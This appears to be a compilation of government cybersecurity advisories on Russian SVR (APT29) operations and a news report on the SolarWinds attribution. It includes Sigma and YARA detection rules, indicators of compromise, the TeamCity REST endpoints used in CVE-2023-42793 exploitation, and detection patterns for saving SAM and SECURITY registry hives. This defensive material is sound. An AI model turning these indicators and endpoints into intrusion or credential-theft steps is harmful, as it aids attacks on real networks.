detection:
    selection_1:
            ScriptBlockText|contains|all:
            - 'Get-WmiObject'
            - '-Class'
            - 'Win32_Service'
    selection_2:
            ScriptBlockText|contains|all:
            - 'Get-WindowsDriver'
            - '-Online'
            - '-All'
    condition: selection_1 or selection_2
falsepositives: legitimate use by system administrator

title: Compressing files from temp to temp
description: Compressing files from temp\ to temp used by SVR to prepare data to be exfiltrated
references:
author: 
date: 2023/11/15
logsource:
    category: ps_script
    product: windows
detection:
    selection:
        ScriptBlockText|re: '.*Compress\-Archive.*Path.*Windows\\[Tt]{1}emp\\[1-9]{1}.*DestinationPath.*Windows\\[Tt]{1}emp\\.*'
    condition: selection

title: DLL names used by SVR for GraphicalProton backdoor
description: Hunts for known SVR-specific DLL names.
references:
author: 
date: 2023/11/15
logsource:
    category: image_load
    product: windows
detection:
    selection:
        ImageLoaded|endswith:
          - 'AclNumsInvertHost.dll'
          - 'ModeBitmapNumericAnimate.dll'
          - 'UnregisterAncestorAppendAuto.dll'
          - 'DeregisterSeekUsers.dll'
          - 'ScrollbarHandleGet.dll'
          - 'PerformanceCaptionApi.dll'
          - 'WowIcmpRemoveReg.dll'
          - 'BlendMonitorStringBuild.dll'
          - 'HandleFrequencyAll.dll'
          - 'HardSwapColor.dll'
          - 'LengthInMemoryActivate.dll'
          - 'ParametersNamesPopup.dll'
          - 'ModeFolderSignMove.dll'
          - 'ChildPaletteConnected.dll'
          - 'AddressResourcesSpec.dll'
    condition: selection

title: Sensitive registry entries saved to file
description: Sensitive registry entries saved to file
author: 
references:
date: 2023/11/15
logsource:
    category: process_creation
    product: windows
detection:
    selection_base:
        Image|endswith:
          - 'reg.exe'
        CommandLine|contains: 'save'
        CommandLine|re: '.*HKLM\\SYSTEM.*|.*HKLM\\SECURITY.*|.*HKLM\\SAM.*'
    selection_file:
      CommandLine|re: '.*sy\.sa.*|.*sam\.sa.*|.*se\.sa.*'
    condition: selection_base and selection_file

title: Scheduled tasks names used by SVR for GraphicalProton backdoor
description: Hunts for known SVR-specific scheduled task names
author: 
references: 
date: 2023/11/15
logsource:
    category: taskscheduler
    product: windows
detection:
    selection:
        EventID:
          - 4698
          - 4699
          - 4702
        TaskName:
          - '\Microsoft\Windows\IISUpdateService'
          - '\Microsoft\Windows\WindowsDefenderService'
          - '\Microsoft\Windows\WindowsDefenderService2'
          - '\Microsoft\DefenderService'
          - '\Microsoft\Windows\DefenderUPDService'
          - '\Microsoft\Windows\WiMSDFS'
          - '\Microsoft\Windows\Application Experience\StartupAppTaskCkeck'
          - '\Microsoft\Windows\Windows Error Reporting\SubmitReporting'
          - '\Microsoft\Windows\Windows Defender\Defender Update Service'
          - '\WindowUpdate'
          - '\Microsoft\Windows\Windows Error Reporting\CheckReporting'
          - '\Microsoft\Windows\Application Experience\StartupAppTaskCheck'
          - '\Microsoft\Windows\Speech\SpeechModelInstallTask'
          - '\Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStart'
          - '\Microsoft\Windows\Data Integrity Scan\Data Integrity Update'
          - '\Microsoft\Windows\WindowsUpdate\Scheduled AutoCheck'
          - '\Microsoft\Windows\ATPUpd'
          - '\Microsoft\Windows\Windows Defender\Service Update'
          - '\Microsoft\Windows\WindowsUpdate\Scheduled Check'
          - '\Microsoft\Windows\WindowsUpdate\Scheduled AutoCheck'
          - '\Defender'
          - '\defender'
          - '\\Microsoft\\Windows\\IISUpdateService'
          - '\\Microsoft\\Windows\\WindowsDefenderService'
          - '\\Microsoft\\Windows\\WindowsDefenderService2'
          - '\\Microsoft\\DefenderService'
          - '\\Microsoft\\Windows\\DefenderUPDService'
          - '\\Microsoft\\Windows\\WiMSDFS'
          - '\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCkeck'
          - '\\Microsoft\\Windows\\Windows Error Reporting\\SubmitReporting'
          - '\\Microsoft\\Windows\\Windows Defender\\Defender Update Service'
          - '\\WindowUpdate'
          - '\\Microsoft\\Windows\\Windows Error Reporting\\CheckReporting'
          - '\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCheck'
          - '\\Microsoft\\Windows\\Speech\\SpeechModelInstallTask'
          - '\\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStart'
          - '\\Microsoft\\Windows\\Data Integrity Scan\Data Integrity Update'
          - '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled AutoCheck'
          - '\\Microsoft\\Windows\\ATPUpd'
          - '\\Microsoft\\Windows\\Windows Defender\\Service Update'
          - '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Check'
          - '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled AutoCheck'
          - '\\Defender'
          - '\\defender'
    condition: selection

title: Scheduled tasks names used by SVR for GraphicalProton backdoor
description: Hunts for known SVR-specific scheduled task names
author: 
references:
date: 2023/11/15
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
          - 'schtasks.exe'
        CommandLine|contains:
          - 'IISUpdateService'
          - 'WindowsDefenderService'
          - 'WindowsDefenderService2'
          - 'DefenderService'
          - 'DefenderUPDService'
          - 'WiMSDFS'
          - 'StartupAppTaskCkeck'
          - 'SubmitReporting'
          - 'Defender Update Service'
          - 'WindowUpdate'
          - 'CheckReporting'
          - 'StartupAppTaskCheck'
          - 'SpeechModelInstallTask'
          - 'BfeOnServiceStart'
          - 'Data Integrity Update'
          - 'Scheduled AutoCheck'
          - 'ATPUpd'
          - 'Service Update'
          - 'Scheduled Check'
          - 'Scheduled AutoCheck'
          - 'Defender'
          - 'defender'
    selection_re:
        Image|endswith:
          - 'schtasks.exe'
        CommandLine|re:
          - '.*Defender\sUpdate\sService.*'
          - '.*Data\sIntegrity\sUpdate.*'
          - '.*Scheduled\sAutoCheck.*'
          - '.*Service\sUpdate.*'
          - '.*Scheduled\sCheck.*'
          - '.*Scheduled\sAutoCheck.*'
    condition: selection or selection_re

title: Suspicious registry modifications
description: Suspicious registry modifications
author: 
references:
date: 2023/11/15
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        EventID: 4657
        TargetObject|contains:
          - 'CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin'
          - 'CurrentControlSet\\Control\\Lsa\\NoLMHash'
    condition: selection

title: Registry modification from cmd
description: Registry modification from cmd
author: 
references:
date: 2023/11/15
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
          - 'reg.exe'
        CommandLine|contains|all:
          - 'CurrentControlSet'
          - 'Lsa'
        CommandLine|contains:
          - 'DisableRestrictedAdmin'
          - 'NoLMHash'
    condition: selection

title: Malicious Driver Load
description: Detects the load of known malicious drivers via their names or hash.
references:
    - https://github.com/wavestone-cdt/EDRSandblast#edr-drivers-and-processes-detection
author: 
date: 2023/11/15
logsource:
    category: driver_load
    product: windows
detection:
    selection_name:
        ImageLoaded|endswith:
            - 'RTCore64.sys'
            - 'DBUtils_2_3.sys'
    selection_hash:
        Hashes|contains:
            - '01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd'
            - '0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5'
    condition: selection_name or selection_hash

YARA rules

The following rule detects most known GraphicalProton variants.

rule APT29_GraphicalProton {
    strings:
        // C1 E9 1B                                shr     ecx, 1Bh
        // 48 8B 44 24 08                          mov     rax, [rsp+30h+var_28]
        // 8B 50 04                                mov     edx, [rax+4]
        // C1 E2 05                                shl     edx, 5
        // 09 D1                                   or      ecx, edx
        // 48 8B 44 24 08                          mov     rax, [rsp+30h+var_28]
        $op_string_crypt = { c1 e? (1b | 18 | 10 | 13 | 19 | 10) 48 [4] 8b [2] c1 e? (05 | 08 | 10 | 0d | 07) 09 ?? 48 }

        // 48 05 20 00 00 00                       add     rax, 20h ; ' '
        // 48 89 C1                                mov     rcx, rax
        // 48 8D 15 0A A6 0D 00                    lea     rdx, unk_14011E546
        // 41 B8 30 00 00 00                       mov     r8d, 30h ; '0'
        // E8 69 B5 FE FF                          call    sub_14002F4B0
        // 48 8B 44 24 30                          mov     rax, [rsp+88h+var_58]
        // 48 05 40 00 00 00                       add     rax, 40h ; '@'
        // 48 89 C1                                mov     rcx, rax
        // 48 8D 15 1B A6 0D 00                    lea     rdx, unk_14011E577
        // 41 B8 70 01 00 00                       mov     r8d, 170h
        // E8 49 B5 FE FF                          call    sub_14002F4B0
        // 48 8B 44 24 30                          mov     rax, [rsp+88h+var_58]
        // 48 05 60 00 00 00                       add     rax, 60h ; '`'
        // 48 89 C1                                mov     rcx, rax
        // 48 8D 15 6C A7 0D 00                    lea     rdx, unk_14011E6E8
        // 41 B8 2F 00 00 00                       mov     r8d, 2Fh ; "https://www.cisa.gov/"
        // E8 29 B5 FE FF                          call    sub_14002F4B0
        // 48 8B 44 24 30                          mov     rax, [rsp+88h+var_58]
        // 48 05 80 00 00 00                       add     rax, 80h
        // 48 89 C1                                mov     rcx, rax
        // 48 8D 15 7C A7 0D 00                    lea     rdx, unk_14011E718
        // 41 B8 2F 00 00 00                       mov     r8d, 2Fh ; "https://www.cisa.gov/"
        // E8 09 B5 FE FF                          call    sub_14002F4B0
        // 48 8B 44 24 30                          mov     rax, [rsp+88h+var_58]
        // 48 05 A0 00 00 00                       add     rax, 0A0h
        $op_decrypt_config = {
            48 05 20 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]
            48 05 40 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]
            48 05 60 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]
            48 05 80 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]
            48 05 A0 00 00 00
        }

    condition:
        all of them
}

Note: These rules are meant for threat hunting and have not been tested on a larger dataset.

MITIGATIONS

The FBI, CISA, NSA, SKW, CERT Polska, and NCSC assess the scope and indiscriminate targeting of this campaign poses a threat to public safety and recommend organizations implement the mitigations below to improve organization’s cybersecurity posture. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

  • Apply available patches for CVE-2023-42793 issued by JetBrains TeamCity in mid-September 2023, if not already completed.
  • Monitor the network for evidence of encoded commands and execution of network scanning tools.
  • Ensure host-based anti-virus/endpoint monitoring solutions are enabled and set to alert if monitoring or reporting is disabled, or if communication is lost with a host agent for more than a reasonable amount of time.
  • Require use of multi-factor authentication [CPG 1.3] for all services to the extent possible, particularly for email, virtual private networks, and accounts that access critical systems.
    • Organizations should adopt multi-factor authentication (MFA) as an additional layer of security for all users with access to sensitive data. Enabling MFA significantly reduces the risk of unauthorized access, even if passwords are compromised.
  • Keep all operating systems, software, and firmware up to date. Immediately configure newly-added systems to the network, including those used for testing or development work, to follow the organization’s security baseline and incorporate into enterprise monitoring tools.
  • Audit log files to identify attempts to access privileged certificates and creation of fake identity providers.
  • Deploy software to identify suspicious behavior on systems.
  • Deploy endpoint protection systems with the ability to monitor for behavioral indicators of compromise.
  • Use available public resources to identify credential abuse with cloud environments.
  • Configure authentication mechanisms to confirm certain user activities on systems, including registering new devices.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, FBI, CISA, NSA, SKW, CERT Polska, and NCSC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI, CISA, NSA, SKW, CERT Polska, and NCSC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see previous tables).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

FBI, CISA, NSA, SKW, CERT Polska, and NCSC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

REFERENCES

The information in this report is being provided “as is” for informational purposes only. FBI, CISA, NSA, SKW, CERT Polska, and NCSC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, NSA, SKW, CERT Polska, and NCSC.

VERSION HISTORY

December 12, 2023: Initial version.

APPENDIX A – INDICATORS OF COMPROMISE CVE-2023-42793

On a Windows system, the log file C:\TeamCity\logs\teamcity-server.log will contain a log message when an attacker modified the internal.properties file. There will also be a log message for every process created via the /app/rest/debug/processes endpoint. In addition to showing the command line used, the user ID of the user account whose authentication token was used during the attack is also shown. For example:

[2023-09-26 11:53:46,970]   INFO - ntrollers.FileBrowseController - File edited: C:\ProgramData\JetBrains\TeamCity\config\internal.properties by user with id=1
[2023-09-26 11:53:46,970]   INFO - s.buildServer.ACTIVITIES.AUDIT - server_file_change: File C:\ProgramData\JetBrains\TeamCity\config\internal.properties was modified by "user with id=1"
[2023-09-26 11:53:58,227]   INFO - tbrains.buildServer.ACTIVITIES - External process is launched by user user with id=1. Command line: cmd.exe "/c whoami"

An attacker may attempt to cover their tracks by wiping this log file. It does not appear that TeamCity logs individual HTTP requests, but if TeamCity is configured to sit behind a HTTP proxy, the HTTP proxy may have suitable logs showing the following target endpoints being accessed:

  • /app/rest/users/id:1/tokens/RPC2 – This endpoint is required to exploit the vulnerability.
  • /app/rest/users – This endpoint is only required if the attacker wishes to create an arbitrary user.
  • /app/rest/debug/processes – This endpoint is only required if the attacker wishes to create an arbitrary process.

Note: The user ID value may be higher than 1.

APPENDIX B – IOCS

File IoCs

GraphicalProton backdoor:

  • 01B5F7094DE0B2C6F8E28AA9A2DED678C166D615530E595621E692A9C0240732
  • 34C8F155601A3948DDB0D60B582CFE87DE970D443CC0E05DF48B1A1AD2E42B5E
  • 620D2BF14FE345EEF618FDD1DAC242B3A0BB65CCB75699FE00F7C671F2C1D869
  • 773F0102720AF2957859D6930CD09693824D87DB705B3303CEF9EE794375CE13
  • 7B666B978DBBE7C032CEF19A90993E8E4922B743EE839632BFA6D99314EA6C53
  • 8AFB71B7CE511B0BCE642F46D6FC5DD79FAD86A58223061B684313966EFEF9C7
  • 971F0CED6C42DD2B6E3EA3E6C54D0081CF9B06E79A38C2EDE3A2C5228C27A6DC
  • CB83E5CB264161C28DE76A44D0EDB450745E773D24BEC5869D85F69633E44DCF
  • CD3584D61C2724F927553770924149BB51811742A461146B15B34A26C92CAD43
  • EBE231C90FAD02590FC56D5840ACC63B90312B0E2FEE7DA3C7606027ED92600E
  • F1B40E6E5A7CBC22F7A0BD34607B13E7E3493B8AAD7431C47F1366F0256E23EB
  • C7B01242D2E15C3DA0F45B8ADEC4E6913E534849CDE16A2A6C480045E03FBEE4
  • 4BF1915785D7C6E0987EB9C15857F7AC67DC365177A1707B14822131D43A6166

GraphicalProton HTTPS backdoor:

  • 18101518EAE3EEC6EBE453DE4C4C380160774D7C3ED5C79E1813013AC1BB0B93
  • 19F1EF66E449CF2A2B0283DBB756850CCA396114286E1485E35E6C672C9C3641
  • 1E74CF0223D57FD846E171F4A58790280D4593DF1F23132044076560A5455FF8
  • 219FB90D2E88A2197A9E08B0E7811E2E0BD23D59233287587CCC4642C2CF3D67
  • 92C7693E82A90D08249EDEAFBCA6533FED81B62E9E056DEC34C24756E0A130A6
  • B53E27C79EED8531B1E05827ACE2362603FB9F77F53CEE2E34940D570217CBF7
  • C37C109171F32456BBE57B8676CC533091E387E6BA733FBAA01175C43CFB6EBD
  • C40A8006A7B1F10B1B42FDD8D6D0F434BE503FB3400FB948AC9AB8DDFA5B78A0
  • C832462C15C8041191F190F7A88D25089D57F78E97161C3003D68D0CC2C4BAA3
  • F6194121E1540C3553273709127DFA1DAAB96B0ACFAB6E92548BFB4059913C69

Backdoored vcperf:

  • D724728344FCF3812A0664A80270F7B4980B82342449A8C5A2FA510E10600443

Backdoored Zabbix installation archive:

  • 4EE70128C70D646C5C2A9A17AD05949CB1FBF1043E9D671998812B2DCE75CF0F

Backdoored Webroot AV installation archive:

  • 950ADBAF66AB214DE837E6F1C00921C501746616A882EA8C42F1BAD5F9B6EFF4

Modified rsockstun

  • CB83E5CB264161C28DE76A44D0EDB450745E773D24BEC5869D85F69633E44DCF

Network IoCs

Tunnel Endpoints

  • 65.20.97[.]203
  • 65.21.51[.]58

Exploitation Server

GraphicalProton HTTPS C2 URL:

hxxps://matclick[.]com/wp-query[.]php

Source…

Russian Foreign Intelligence Service (SVR) Cyber Operations: Trends and Best Practices for Network Defenders


The Federal Bureau of Investigation (FBI), Department of Homeland Security (DHS), and Cybersecurity and Infrastructure Security Agency (CISA) assess Russian Foreign Intelligence Service (SVR) cyber actors—also known as Advanced Persistent Threat 29 (APT 29), the Dukes, CozyBear, and Yttrium—will continue to seek intelligence from U.S. and foreign entities through cyber exploitation, using a range of initial exploitation techniques that vary in sophistication, coupled with stealthy intrusion tradecraft within compromised networks. The SVR primarily targets government networks, think tank and policy analysis organizations, and information technology companies. On April 15, 2021, the White House released a statement on the recent SolarWinds compromise, attributing the activity to the SVR. For additional detailed information on identified vulnerabilities and mitigations, see the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and FBI Cybersecurity Advisory titled “Russian SVR Targets U.S. and Allied Networks,” released on April 15, 2021.

The FBI and DHS are providing information on the SVR’s cyber tools, targets, techniques, and capabilities to aid organizations in conducting their own investigations and securing their networks.

Click here for a PDF version of this report.

Threat Overview

SVR cyber operations have posed a longstanding threat to the United States. Prior to 2018, several private cyber security companies published reports about APT 29 operations to obtain access to victim networks and steal information, highlighting the use of customized tools to maximize stealth inside victim networks and APT 29 actors’ ability to move within victim environments undetected.

Beginning in 2018, the FBI observed the SVR shift from using malware on victim networks to targeting cloud resources, particularly e-mail, to obtain information. The exploitation of Microsoft Office 365 environments following network access gained through use of modified SolarWinds software reflects this continuing trend. Targeting cloud resources probably reduces the likelihood of detection by using compromised accounts or system misconfigurations to blend in with normal or unmonitored traffic in an environment not well defended, monitored, or understood by victim organizations.

SVR Cyber Operations Tactics, Techniques, and Procedures

Password Spraying

In one 2018 compromise of a large network, SVR cyber actors used password spraying to identify a weak password associated with an administrative account. The actors conducted the password spraying activity in a “low and slow” manner, attempting a small number of passwords at infrequent intervals, possibly to avoid detection. The password spraying used a large number of IP addresses all located in the same country as the victim, including those associated with residential, commercial, mobile, and The Onion Router (TOR) addresses.

The organization unintentionally exempted the compromised administrator’s account from multi-factor authentication requirements. With access to the administrative account, the actors modified permissions of specific e-mail accounts on the network, allowing any authenticated network user to read those accounts.

The actors also used the misconfiguration for compromised non-administrative accounts. That misconfiguration enabled logins using legacy single-factor authentication on devices which did not support multi-factor authentication. The FBI suspects this was achieved by spoofing user agent strings to appear to be older versions of mail clients, including Apple’s mail client and old versions of Microsoft Outlook. After logging in as a non-administrative user, the actors used the permission changes applied by the compromised administrative user to access specific mailboxes of interest within the victim organization.

While the password sprays were conducted from many different IP addresses, once the actors obtained access to an account, that compromised account was generally only accessed from a single IP address corresponding to a leased virtual private server (VPS). The FBI observed minimal overlap between the VPSs used for different compromised accounts, and each leased server used to conduct follow-on actions was in the same country as the victim organization.

During the period of their access, the actors consistently logged into the administrative account to modify account permissions, including removing their access to accounts presumed to no longer be of interest, or adding permissions to additional accounts. 

Recommendations

To defend from this technique, the FBI and DHS recommend network operators to follow best practices for configuring access to cloud computing environments, including:

  • Mandatory use of an approved multi-factor authentication solution for all users from both on premises and remote locations.
  • Prohibit remote access to administrative functions and resources from IP addresses and systems not owned by the organization.
  • Regular audits of mailbox settings, account permissions, and mail forwarding rules for evidence of unauthorized changes.
  • Where possible, enforce the use of strong passwords and prevent the use of easily guessed or commonly used passwords through technical means, especially for administrative accounts.
  • Regularly review the organization’s password management program.
  • Ensure the organization’s information technology (IT) support team has well-documented standard operating procedures for password resets of user account lockouts.
  • Maintain a regular cadence of security awareness training for all company employees.

Leveraging Zero-Day Vulnerability

In a separate incident, SVR actors used CVE-2019-19781, a zero-day exploit at the time, against a virtual private network (VPN) appliance to obtain network access. Following exploitation of the device in a way that exposed user credentials, the actors identified and authenticated to systems on the network using the exposed credentials.

The actors worked to establish a foothold on several different systems that were not configured to require multi-factor authentication and attempted to access web-based resources in specific areas of the network in line with information of interest to a foreign intelligence service.

Following initial discovery, the victim attempted to evict the actors. However, the victim had not identified the initial point of access, and the actors used the same VPN appliance vulnerability to regain access. Eventually, the initial access point was identified, removed from the network, and the actors were evicted. As in the previous case, the actors used dedicated VPSs located in the same country as the victim, probably to make it appear that the network traffic was not anomalous with normal activity.

Recommendations

To defend from this technique, the FBI and DHS recommend network defenders ensure endpoint monitoring solutions are configured to identify evidence of lateral movement within the network and:

  • Monitor the network for evidence of encoded PowerShell commands and execution of network scanning tools, such as NMAP.
  • Ensure host based anti-virus/endpoint monitoring solutions are enabled and set to alert if monitoring or reporting is disabled, or if communication is lost with a host agent for more than a reasonable amount of time.
  • Require use of multi-factor authentication to access internal systems.
  • Immediately configure newly-added systems to the network, including those used for testing or development work, to follow the organization’s security baseline and incorporate into enterprise monitoring tools.

WELLMESS Malware

In 2020, the governments of the United Kingdom, Canada, and the United States attributed intrusions perpetrated using malware known as WELLMESS to APT 29. WELLMESS was written in the Go programming language, and the previously-identified activity appeared to focus on targeting COVID-19 vaccine development. The FBI’s investigation revealed that following initial compromise of a network—normally through an unpatched, publicly-known vulnerability—the actors deployed WELLMESS. Once on the network, the actors targeted each organization’s vaccine research repository and Active Directory servers. These intrusions, which mostly relied on targeting on-premises network resources, were a departure from historic tradecraft, and likely indicate new ways the actors are evolving in the virtual environment. More information about the specifics of the malware used in this intrusion have been previously released and are referenced in the ‘Resources’ section of this document.

Tradecraft Similarities of SolarWinds-enabled Intrusions

During the spring and summer of 2020, using modified SolarWinds network monitoring software as an initial intrusion vector, SVR cyber operators began to expand their access to numerous networks. The SVR’s modification and use of trusted SolarWinds products as an intrusion vector is also a notable departure from the SVR’s historic tradecraft.

The FBI’s initial findings indicate similar post-infection tradecraft with other SVR-sponsored intrusions, including how the actors purchased and managed infrastructure used in the intrusions. After obtaining access to victim networks, SVR cyber actors moved through the networks to obtain access to e-mail accounts. Targeted accounts at multiple victim organizations included accounts associated with IT staff. The FBI suspects the actors monitored IT staff to collect useful information about the victim networks, determine if victims had detected the intrusions, and evade eviction actions.

Recommendations

Although defending a network from a compromise of trusted software is difficult, some organizations successfully detected and prevented follow-on exploitation activity from the initial malicious SolarWinds software. This was achieved using a variety of monitoring techniques including:

  • Auditing log files to identify attempts to access privileged certificates and creation of fake identify providers.
  • Deploying software to identify suspicious behavior on systems, including the execution of encoded PowerShell.
  • Deploying endpoint protection systems with the ability to monitor for behavioral indicators of compromise.
  • Using available public resources to identify credential abuse within cloud environments.
  • Configuring authentication mechanisms to confirm certain user activities on systems, including registering new devices.

While few victim organizations were able to identify the initial access vector as SolarWinds software, some were able to correlate different alerts to identify unauthorized activity. The FBI and DHS believe those indicators, coupled with stronger network segmentation (particularly “zero trust” architectures or limited trust between identity providers) and log correlation, can enable network defenders to identify suspicious activity requiring additional investigation.

General Tradecraft Observations

SVR cyber operators are capable adversaries. In addition to the techniques described above, FBI investigations have revealed infrastructure used in the intrusions is frequently obtained using false identities and cryptocurrencies. VPS infrastructure is often procured from a network of VPS resellers. These false identities are usually supported by low reputation infrastructure including temporary e-mail accounts and temporary voice over internet protocol (VoIP) telephone numbers. While not exclusively used by SVR cyber actors, a number of SVR cyber personas use e-mail services hosted on cock[.]li or related domains.

The FBI also notes SVR cyber operators have used open source or commercially available tools continuously, including Mimikatz—an open source credential-dumping too—and Cobalt Strike—a commercially available exploitation tool.

Source…

White House blames Russian spy agency SVR for SolarWinds hack – Benchmarking Change


The White House said in a statement on Thursday that Russia’s foreign intelligence service, known as the SVR, was responsible for the SolarWinds hack, which led to the compromise of nine federal agencies and hundreds of private sector companies.

Senior US government officials had already said the Russian government was responsible for the sprawling cyber attack, but Thursday’s announcement offers the first formal statement pinning the operation on a specific agency.

The White House statement was paired with a series of sanctions against five Russian cyber security firms, which the Treasury Department said had been involved in supporting Russian cyber operations.

SVR has reportedly dismissed the claim as “nonsense” and “windbaggery”.

While some national security experts say the SolarWinds hacking operation could be viewed as a traditional espionage activity that is not uncommon between government hackers, the Treasury Department in its statement said the “scope and scale of this compromise combined with Russia’s history of carrying out reckless and disruptive cyber operations makes it a national security concern.”

The National Security Agency, FBI and Cybersecurity Infrastructure Security Agency also revealed on Thursday that the SVR was exploiting five known computer software vulnerabilities.

The announcement came with links to a series of related software patches by the companies who make those products, including VMware and Fortinet.

“The vulnerabilities in today’s release are part of the SVR’s toolkit to target networks across the government and private sectors. We need to make SVR’s job harder by taking them away,” Rob Joyce, NSA director of cybersecurity, said.

Source…